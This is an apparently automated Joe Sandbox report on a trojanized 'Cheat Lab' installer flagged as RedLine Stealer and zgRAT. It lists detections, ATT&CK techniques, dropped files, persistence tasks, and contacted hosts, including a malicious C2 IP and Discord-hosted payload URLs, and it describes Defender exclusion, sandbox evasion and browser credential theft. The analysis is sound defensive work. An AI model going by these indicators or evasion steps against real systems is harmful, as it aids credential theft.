bracketfailed to get memory
                        Source: Carbon.pifBinary or memory string: WIN_7
                        Source: Carbon.pifBinary or memory string: WIN_8
                        Source: Yara matchFile source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3034718882.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894002689.0000000003959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2951972819.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894424466.00000000039FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.00000000039A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2893791274.00000000038DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3026594821.0000000001392000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894095671.0000000004501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2902535107.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2954888933.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894335266.0000000003958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2894468357.00000000038FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2951833914.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2950664507.0000000003907000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Yara detected zgRAT
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39067e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.3a00a80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPE
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0097198B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,29_2_0097198B
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00971F8D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,29_2_00971F8D

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                        2
                        Valid Accounts                        		221
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Exploitation for Privilege Escalation                        		111
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		2
                        System Time Discovery                        		1
                        Replication Through Removable Media                        		11
                        Archive Collected Data                        		Exfiltration Over Other Network Medium2
                        Ingress Tool Transfer                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                        System Shutdown/Reboot                        		Acquire InfrastructureGather Victim Identity Information
                        1
                        Replication Through Removable Media                        		1
                        Native API                        		2
                        Valid Accounts                        		1
                        DLL Side-Loading                        		11
                        Deobfuscate/Decode Files or Information                        		121
                        Input Capture                        		11
                        Peripheral Device Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		Exfiltration Over Bluetooth11
                        Encrypted Channel                        		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                        Domain Accounts1
                        Command and Scripting Interpreter                        		12
                        Registry Run Keys / Startup Folder                        		2
                        Valid Accounts                        		2
                        Obfuscated Files or Information                        		Security Account Manager1
                        Account Discovery                        		SMB/Windows Admin Shares121
                        Input Capture                        		Automated Exfiltration1
                        Non-Standard Port                        		Data Encrypted for ImpactDNS ServerEmail Addresses
                        Local Accounts2
                        PowerShell                        		Login Hook21
                        Access Token Manipulation                        		1
                        Software Packing                        		NTDS3
                        File and Directory Discovery                        		Distributed Component Object Model4
                        Clipboard Data                        		Traffic Duplication2
                        Non-Application Layer Protocol                        		Data DestructionVirtual Private ServerEmployee Names
                        Cloud AccountsLaunchdNetwork Logon Script212
                        Process Injection                        		1
                        DLL Side-Loading                        		LSA Secrets138
                        System Information Discovery                        		SSHKeyloggingScheduled Transfer3
                        Application Layer Protocol                        		Data Encrypted for ImpactServerGather Victim Network Information
                        Replication Through Removable MediaScheduled TaskRC Scripts12
                        Registry Run Keys / Startup Folder                        		1
                        File Deletion                        		Cached Domain Credentials641
                        Security Software Discovery                        		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                        External Remote ServicesSystemd TimersStartup ItemsStartup Items133
                        Masquerading                        		DCSync531
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                        Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                        Valid Accounts                        		Proc Filesystem4
                        Process Discovery                        		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                        Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt531
                        Virtualization/Sandbox Evasion                        		/etc/passwd and /etc/shadow11
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                        Supply Chain CompromisePowerShellCronCron21
                        Access Token Manipulation                        		Network Sniffing1
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
                        Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                        Process Injection                        		Input Capture1
                        Remote System Discovery                        		Software Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
                        Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging11
                        System Network Configuration Discovery                        		Taint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1374044 Sample: Cheat.Lab.2.7.2.msi Startdate: 12/01/2024 Architecture: WINDOWS Score: 84 102 ip-api.com 2->102 104 cdn.discordapp.com 2->104 106 KualBsmtIVFpTexCtErDRKSXzMSbr.KualBsmtIVFpTexCtErDRKSXzMSbr 2->106 118 Snort IDS alert for network traffic 2->118 120 Malicious sample detected (through community Yara rule) 2->120 122 Antivirus detection for URL or domain 2->122 124 6 other signatures 2->124 11 connect.exe 2->11         started        15 msiexec.exe 12 37 2->15         started        17 compiler.exe 8 40 2->17         started        20 2 other processes 2->20 signatures3 process4 dnsIp5 68 C:\Users\user\AppData\Local\Temp\...\Dns, PE32 11->68 dropped 142 Contains functionality to register a low level keyboard hook 11->142 22 cmd.exe 11->22         started        25 conhost.exe 11->25         started        70 C:\Program Files\...\compiler.exe, PE32+ 15->70 dropped 72 C:\Windows\Installer\MSI841.tmp, PE32 15->72 dropped 74 C:\Windows\Installer\MSI7E2.tmp, PE32 15->74 dropped 82 6 other files (none is malicious) 15->82 dropped 27 msiexec.exe 8 15->27         started        30 msiexec.exe 1 15->30         started        32 msiexec.exe 2 15->32         started        96 ip-api.com 208.95.112.1, 49735, 80 TUT-ASUS United States 17->96 98 213.248.43.48, 49737, 80 DINET-ASRU Russian Federation 17->98 100 cdn.discordapp.com 162.159.130.233, 443, 49738, 49739 CLOUDFLARENETUS United States 17->100 76 C:\Users\user\AppData\Roaming\...\connect.exe, PE32 17->76 dropped 78 C:\ProgramData\...78zQx.exe, PE32+ 17->78 dropped 144 Suspicious powershell command line found 17->144 34 powershell.exe 33 17->34         started        80 C:\Users\user\AppData\Local\...\MSIF577.tmp, PE32 20->80 dropped 84 11 other files (none is malicious) 20->84 dropped file6 signatures7 process8 file9 132 Uses ping.exe to sleep 22->132 134 Drops PE files with a suspicious file extension 22->134 136 Uses ping.exe to check the status of other devices and networks 22->136 36 cmd.exe 22->36         started        39 conhost.exe 22->39         started        86 C:\Users\user\AppData\Local\Temp\scr86B.ps1, Unicode 27->86 dropped 88 C:\Users\user\AppData\Local\Temp\pss87C.ps1, Unicode 27->88 dropped 41 powershell.exe 15 27->41         started        138 Query firmware table information (likely to detect VMs) 30->138 140 Bypasses PowerShell execution policy 30->140 43 compiler.exe 30->43         started        45 conhost.exe 34->45         started        signatures10 process11 signatures12 126 Uses ping.exe to sleep 36->126 47 Carbon.pif 36->47         started        51 cmd.exe 36->51         started        53 tasklist.exe 36->53         started        59 6 other processes 36->59 128 Suspicious powershell command line found 41->128 130 Adds a directory exclusion to Windows Defender 41->130 55 powershell.exe 21 41->55         started        57 conhost.exe 41->57         started        process13 file14 92 C:\Users\user\AppData\Local\Temp\...\jsc.exe, PE32 47->92 dropped 110 Found API chain indicative of debugger detection 47->110 112 Found API chain indicative of sandbox detection 47->112 114 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 47->114 116 2 other signatures 47->116 61 jsc.exe 47->61         started        94 C:\Users\user\AppData\Local\...\Carbon.pif, PE32 51->94 dropped signatures15 process16 dnsIp17 108 45.15.156.186, 29975, 49741 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 61->108 90 C:\Users\user\AppData\Roaming\...\qemu-ga.exe, PE32 61->90 dropped 146 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 61->146 148 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 61->148 150 Drops PE files to the startup folder 61->150 152 Tries to harvest and steal browser information (history, passwords, etc) 61->152 66 qemu-ga.exe 61->66         started        file18 signatures19 process20

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Cheat.Lab.2.7.2.msi0%ReversingLabs

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe0%ReversingLabs
                        C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzQx.exe0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif5%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dns8%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSI5924.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSI5963.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF2CE.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF38B.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF3AB.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF3DB.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF3FB.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF479.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF507.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF527.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF557.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSIF577.tmp0%ReversingLabs
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe3%ReversingLabs
                        C:\Windows\Installer\MSI4E34.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI4F2F.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI695.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI713.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI743.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI773.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI7E2.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI841.tmp0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                        https://go.micro0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://www.microsoft.0%URL Reputationsafe
                        http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe
                        http://ocsp2.globign.com/rootr3060%Avira URL Cloudsafe
                        https://luajit.org/0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        cdn.discordapp.com
                        		162.159.130.233
                        		truefalse
                          		high
                          ip-api.com
                          		208.95.112.1
                          		truefalse
                            		high
                            KualBsmtIVFpTexCtErDRKSXzMSbr.KualBsmtIVFpTexCtErDRKSXzMSbr
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://ip-api.com/json/?fields=query,status,countryCode,city,timezonefalse
                                		high
                                https://cdn.discordapp.com/attachments/1194585859404599367/1194585905420320788/2false
                                  		high
                                  http://cdn.discordapp.com/attachments/1194585859404599367/1194585905420320788/2false
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1857206800.0000022C513C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808676606.0000022C42C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1857206800.0000022C5128F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750185508.00000203DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://luajit.org/compiler.exe, 0000000B.00000000.1900902817.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: malware
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1734682756.00000203CD708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://go.micropowershell.exe, 00000004.00000002.1808676606.0000022C41E42000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1734682756.00000203CD708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000E.00000002.2557762473.0000022F4BFB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://contoso.com/powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1857206800.0000022C513C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808676606.0000022C42C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1857206800.0000022C5128F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750185508.00000203DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.autoitscript.com/autoit3/Xconnect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp, Carbon.pif, 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                  		high
                                                  http://www.microsoft.powershell.exe, 0000000E.00000002.2561242498.0000022F4C092000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://aka.ms/pscore68powershell.exe, 00000004.00000002.1808676606.0000022C41211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1734682756.00000203CD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.autoitscript.com/autoit3/connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1808676606.0000022C41211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1734682756.00000203CD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ocsp2.globign.com/rootr306connect.exe, 00000010.00000003.2498819056.0000000002800000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          208.95.112.1
                                                          		ip-api.comUnited States
                                                          		53334TUT-ASUSfalse
                                                          162.159.130.233
                                                          		cdn.discordapp.comUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          213.248.43.48
                                                          		unknownRussian Federation
                                                          		12695DINET-ASRUfalse
                                                          45.15.156.186
                                                          		unknownRussian Federation
                                                          		39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue

                                                          General Information

                                                          Joe Sandbox version:38.0.0 Ammolite
                                                          Analysis ID:1374044
                                                          Start date and time:2024-01-12 23:11:08 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 15m 16s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:34
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Cheat.Lab.2.7.2.msi
                                                          Detection:MAL
                                                          Classification:mal84.troj.adwa.spyw.evad.winMSI@49/74@3/4
                                                          EGA Information:
                                                          • Successful, ratio: 42.9%
                                                          HCA Information:
                                                          • Successful, ratio: 98%
                                                          • Number of executed functions: 187
                                                          • Number of non-executed functions: 217
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .msi
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                          • Excluded IPs from analysis (whitelisted): 104.72.157.175
                                                          • Excluded domains from analysis (whitelisted): www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                          • Execution Graph export aborted for target jsc.exe, PID 7848 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 5084 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7256 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 8144 because it is empty
                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                          • VT rate limit hit for: Cheat.Lab.2.7.2.msi

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          22:12:21Task SchedulerRun new task: CheatLabInstallTaskC path: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe s>"C:\Program Files\Cheat Lab Inc\Cheat Lab\config"
                                                          22:13:15Task SchedulerRun new task: Y29ubmVjdDc0MQ== path: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                          22:14:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                                                          23:12:03API Interceptor86x Sleep call for process: powershell.exe modified
                                                          23:13:26API Interceptor5x Sleep call for process: Carbon.pif modified
                                                          23:14:11API Interceptor21x Sleep call for process: jsc.exe modified
                                                          23:14:15API Interceptor2038485x Sleep call for process: qemu-ga.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          208.95.112.1file.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          Agonied_Grabber_V2.4.exeGet hashmaliciousBlank GrabberBrowse
                                                          • ip-api.com/json/?fields=225545
                                                          RGyT9gS5Wp.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          FedEx_AWB#_8116010123507.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG2110017156060.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211003417156060.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211001715606.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          e-dekont.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          051223_JOK_JOKSP67123_MSI_-_Marine_Spares_International.xls.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          MV_CHARLENE_DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          Notificaci#U00f3n_Transferencia_Interbancaria.exeGet hashmaliciousAgentTeslaBrowse
                                                          • ip-api.com/line/?fields=hosting
                                                          17049844844c91418df05caa784d7b01efd38530d3b9f4085141b3efa51b2282b1bd03abee258.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                          • ip-api.com/line/?fields=hosting
